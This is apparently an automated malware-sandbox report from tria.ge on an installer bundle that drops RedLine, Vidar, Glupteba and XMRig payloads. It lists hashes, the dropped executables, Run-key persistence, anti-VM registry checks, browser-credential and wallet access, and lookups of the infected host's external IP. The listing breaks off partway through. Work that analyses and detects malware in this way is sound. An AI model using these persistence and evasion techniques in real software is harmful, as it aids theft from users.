Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
8setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
07/09/2021, 17:26
210907-vzzaxsdae6 1007/09/2021, 13:18
210907-qkaa2acfe3 1006/09/2021, 17:52
210906-wfz9jsbch4 1006/09/2021, 17:51
210906-wfnwhsbch3 1006/09/2021, 13:27
210906-qp3hdaedaj 1006/09/2021, 09:28
210906-lfpgyaeael 1006/09/2021, 04:33
210906-e6mmpsaaa2 1005/09/2021, 05:25
210905-f4h26sfab6 1004/09/2021, 21:32
210904-1dqdsahfdj 1004/09/2021, 21:19
210904-z56z6shfck 10Analysis
-
max time kernel
655s -
max time network
1569s -
platform
windows11_x64 -
resource
win11 -
submitted
06/09/2021, 04:33
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
2.2MB
-
MD5
e3b3a95ef03de0de77cca7a54ea22c94
-
SHA1
d318d234f8f27f25de660d9881113df9d11c24ff
-
SHA256
baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
-
SHA512
3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral5/memory/6936-611-0x0000000002D40000-0x0000000003667000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 724 4792 rundll32.exe 51 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5832 4792 rundll32.exe 51 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5132 4792 rundll32.exe 51 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral5/memory/1368-251-0x00000000073B0000-0x00000000073E8000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 21 IoCs
description pid Process procid_target PID 344 created 3828 344 WerFault.exe 95 PID 960 created 4448 960 WerFault.exe 94 PID 2788 created 556 2788 WerFault.exe 114 PID 5328 created 3300 5328 WerFault.exe 117 PID 5540 created 5200 5540 WerFault.exe 124 PID 5168 created 452 5168 WerFault.exe 115 PID 3040 created 4468 3040 WerFault.exe 154 PID 5856 created 2440 5856 WerFault.exe 107 PID 5080 created 5228 5080 WerFault.exe 123 PID 5564 created 5640 5564 WerFault.exe 140 PID 2488 created 5600 2488 WerFault.exe 150 PID 7012 created 1380 7012 WerFault.exe 180 PID 668 created 5540 668 WerFault.exe 217 PID 1368 created 5676 1368 WerFault.exe 205 PID 6336 created 2800 6336 WerFault.exe 214 PID 6964 created 4892 6964 WerFault.exe 206 PID 5580 created 1180 5580 WerFault.exe 210 PID 648 created 6936 648 WerFault.exe 233 PID 2240 created 5700 2240 WerFault.exe 299 PID 5116 created 4676 5116 WerFault.exe 304 PID 6260 created 2824 6260 WerFault.exe 309 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral5/memory/4448-203-0x0000000003EA0000-0x0000000003F73000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral5/memory/3228-627-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
resource yara_rule behavioral5/files/0x000100000002b1b7-155.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b7-156.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b8-154.dat aspack_v212_v242 behavioral5/files/0x000100000002b1ba-161.dat aspack_v212_v242 behavioral5/files/0x000100000002b1ba-160.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b8-159.dat aspack_v212_v242 -
Blocklisted process makes network request 45 IoCs
flow pid Process 35 5220 cmd.exe 45 5220 cmd.exe 123 4204 MsiExec.exe 124 4204 MsiExec.exe 125 4204 MsiExec.exe 126 4204 MsiExec.exe 127 4204 MsiExec.exe 128 4204 MsiExec.exe 129 4204 MsiExec.exe 130 4204 MsiExec.exe 131 4204 MsiExec.exe 132 4204 MsiExec.exe 134 4204 MsiExec.exe 136 4204 MsiExec.exe 137 4204 MsiExec.exe 138 4204 MsiExec.exe 139 4204 MsiExec.exe 140 4204 MsiExec.exe 141 4204 MsiExec.exe 142 4204 MsiExec.exe 143 4204 MsiExec.exe 144 4204 MsiExec.exe 145 4204 MsiExec.exe 146 4204 MsiExec.exe 147 4204 MsiExec.exe 148 4204 MsiExec.exe 149 4204 MsiExec.exe 150 4204 MsiExec.exe 151 4204 MsiExec.exe 153 4204 MsiExec.exe 154 4204 MsiExec.exe 156 4204 MsiExec.exe 158 4204 MsiExec.exe 159 4204 MsiExec.exe 160 4204 MsiExec.exe 161 4204 MsiExec.exe 162 4204 MsiExec.exe 163 4204 MsiExec.exe 164 4204 MsiExec.exe 165 4204 MsiExec.exe 166 4204 MsiExec.exe 167 4204 MsiExec.exe 168 4204 MsiExec.exe 169 4204 MsiExec.exe 170 4204 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts setup.exe File opened for modification C:\Windows\system32\drivers\etc\hosts zab2our.exe -
Executes dropped EXE 64 IoCs
pid Process 4260 setup_installer.exe 3548 setup_install.exe 4972 Fri156ec98815f89c.exe 4448 Fri1544861ac3fe6a.exe 5112 Fri155442fc38b.exe 3828 Fri15af75ee9b.exe 2236 Fri1553f0ee90.exe 3780 Fri157e25afd971.exe 648 Fri157e25afd971.tmp 2096 LzmwAqmV.exe 2348 zab2our.exe 2440 1279257.exe 4968 5100481.exe 1368 3233656.exe 4548 Chrome 5.exe 4460 PublicDwlBrowser1100.exe 452 2.exe 3300 setup.exe 5200 Pubdate.exe 5228 2902519.exe 5220 4158650.exe 5404 setup_2.exe 5396 5859906.exe 5444 6723743.exe 5560 3002.exe 5568 8843710.exe 5640 8817294.exe 5680 setup_2.tmp 5784 jhuuee.exe 5992 BearVpn 3.exe 6104 setup_2.exe 2340 4447160.exe 5236 setup_2.tmp 1732 1411151.exe 5600 3278603.exe 5760 Xigysanupi.exe 4128 ultramediaburner.exe 4448 ultramediaburner.tmp 5364 Devugaraesae.exe 5136 UltraMediaBurner.exe 5760 Xigysanupi.exe 5376 services64.exe 1380 GcleanerEU.exe 6648 installer.exe 6056 anyname.exe 5420 BsInstFile.exe 2908 anyname.exe 5676 askinstall52.exe 4892 4616743.exe 1420 4590327.exe 1180 Cleanpro13.exe 2800 gcleaner.exe 6664 installer.exe 6936 app.exe 6256 sihost64.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 3084 search_awesome.exe 2476 setup.exe 5700 setup.exe 4676 setup.exe 5084 setup.exe 2252 FreeVPN.exe 1412 FreeVPN.exe 2824 FreeVPN.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4447160.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4447160.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe -
Loads dropped DLL 56 IoCs
pid Process 3548 setup_install.exe 3548 setup_install.exe 3548 setup_install.exe 3548 setup_install.exe 3548 setup_install.exe 648 Fri157e25afd971.tmp 556 rundll32.exe 5680 setup_2.tmp 5236 setup_2.tmp 4468 rundll32.exe 6648 installer.exe 6648 installer.exe 6648 installer.exe 5928 MsiExec.exe 5928 MsiExec.exe 5540 rundll32.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 4204 MsiExec.exe 6648 installer.exe 4204 MsiExec.exe 4204 MsiExec.exe 1580 MsiExec.exe 1580 MsiExec.exe 4204 MsiExec.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 5040 freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 3084 search_awesome.exe 2252 FreeVPN.exe 2252 FreeVPN.exe 1412 FreeVPN.exe 1412 FreeVPN.exe 2824 FreeVPN.exe 2824 FreeVPN.exe 132 FreeVPN.exe 132 FreeVPN.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x000200000002b1ec-283.dat themida behavioral5/files/0x000200000002b1ec-292.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5100481.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft\\Hanohaesaexo.exe\"" zab2our.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4447160.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 109 ipinfo.io 13 ip-api.com 13 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5220 cmd.exe 2340 4447160.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5376 set thread context of 3228 5376 services64.exe 250 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Search Awesome\FF\db\empty\secmod.db search_awesome.exe File opened for modification C:\Program Files (x86)\Search Awesome\FF\bin\sqlite3.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\index.html FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\command.js FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\settings.json freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\nspr4.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\DZ_YjBPqZ88vcZCcIXm6VkbcKLIaa1LC45dFaAfauRA.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\libeay32.dll freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File created C:\Program Files (x86)\Search Awesome\FF\certificate.cer search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\oxrPYIm05JrY_0rFIEQ_oRJtnKITppOI_IvcXXDNrsc.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html.zip FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\fontawesome-webfont.ttf FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\open_selector.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\main_free.html FreeVPN.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\FreeVPN\Release.7z freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File created C:\Program Files (x86)\Search Awesome\Release.7z search_awesome.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\COPYING search_awesome.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\smime3.dll search_awesome.exe File opened for modification C:\Program Files (x86)\FreeVPN\FreeVPN.exe freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwjTOQ_MqJVwkKsUn0wKzc2I.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\sDGTilo5QRsfWu6Yc11AXg.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\big_logo.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\closed_selector1.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\googlepl.png FreeVPN.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\freebl3.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\X_EdMnknKUltk57alVVbVxJtnKITppOI_IvcXXDNrsc.woff2 FreeVPN.exe File opened for modification C:\Program Files (x86)\FreeVPN\search_awesome.exe freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File opened for modification C:\Program Files (x86)\Search Awesome\FF\bin\ssl3.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwjUj_cnvWIuuBMVgbX098Mw.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\txt_logo.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\IiMFELcoPB-OzGzq14k4ehJtnKITppOI_IvcXXDNrsc.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn2.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\question2.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\start.js FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwo4P5ICox8Kq3LLUNMylGO4.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\PIE.htc FreeVPN.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\ssl3.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\star_gray.png FreeVPN.exe File opened for modification C:\Program Files (x86)\Search Awesome\FF\db search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\w3OQMu9Ox3bN1d9i3mbh2xTbgVql8nDJpwnrE27mub0.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\close_btn.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\jquery.min.js FreeVPN.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\softokn3.dll search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\0ihfXUL2emPh0ROJezvraFtXRa8TVwTICgirnJhmVJw.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\facebook.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\reddit.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\notification.js FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\css\menu1.css FreeVPN.exe File created C:\Program Files (x86)\Search Awesome\FF\bin\README.md search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\DZ_YjBPqZ88vcZCcIXm6VjTOQ_MqJVwkKsUn0wKzc2I.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\Wu5Iuha-XnKDBvqRwQzAG_esZW2xOQ-xsNqO47m55DA.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\logout_img.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn1.png FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\move.js FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\default.ico freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File opened for modification C:\Program Files (x86)\Search Awesome\setup.exe search_awesome.exe File created C:\Program Files (x86)\FreeVPN\FreeVPN.exe freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File created C:\Program Files (x86)\FreeVPN\search_awesome.exe freevpn_setup_e_wda0e98dn41o9k9a2j7ngd88.exe File opened for modification C:\Program Files (x86)\Search Awesome\FF\bin\LICENSE search_awesome.exe File created C:\Program Files (x86)\FreeVPN\html\html\fonts\2vaWVxeAxHVkFcnCBCQCyRJtnKITppOI_IvcXXDNrsc.woff2 FreeVPN.exe File created C:\Program Files (x86)\FreeVPN\html\html\js\bridge.js FreeVPN.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp -
Drops file in Windows directory 28 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI772F.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF0F05AC4FA14D8042.TMP msiexec.exe File opened for modification C:\Windows\Installer\f746d56.msi msiexec.exe File created C:\Windows\SystemTemp\~DF0E642D07A3BF696B.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI7E16.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI859B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8D7F.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFEA78C01D38061677.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI7352.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFA91C43D6B707FC88.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8DFD.tmp msiexec.exe File created C:\Windows\Installer\f746d56.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI74E9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI76D1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8069.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8917.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C26.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI82FA.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI6F3A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7587.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7643.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8937.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
pid pid_target Process procid_target 1280 4448 WerFault.exe 94 1180 3828 WerFault.exe 95 5184 556 WerFault.exe 114 5368 3300 WerFault.exe 117 5748 5200 WerFault.exe 124 5852 452 WerFault.exe 115 5268 4468 WerFault.exe 154 5316 2440 WerFault.exe 107 5168 5228 WerFault.exe 123 3136 5640 WerFault.exe 140 2912 5600 WerFault.exe 150 3800 1380 WerFault.exe 180 5888 5540 WerFault.exe 217 6180 5676 WerFault.exe 205 6512 2800 WerFault.exe 214 7012 4892 WerFault.exe 206 1908 1180 WerFault.exe 210 920 6936 WerFault.exe 233 5048 5700 WerFault.exe 299 1532 4676 WerFault.exe 304 5600 2824 WerFault.exe 309 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried 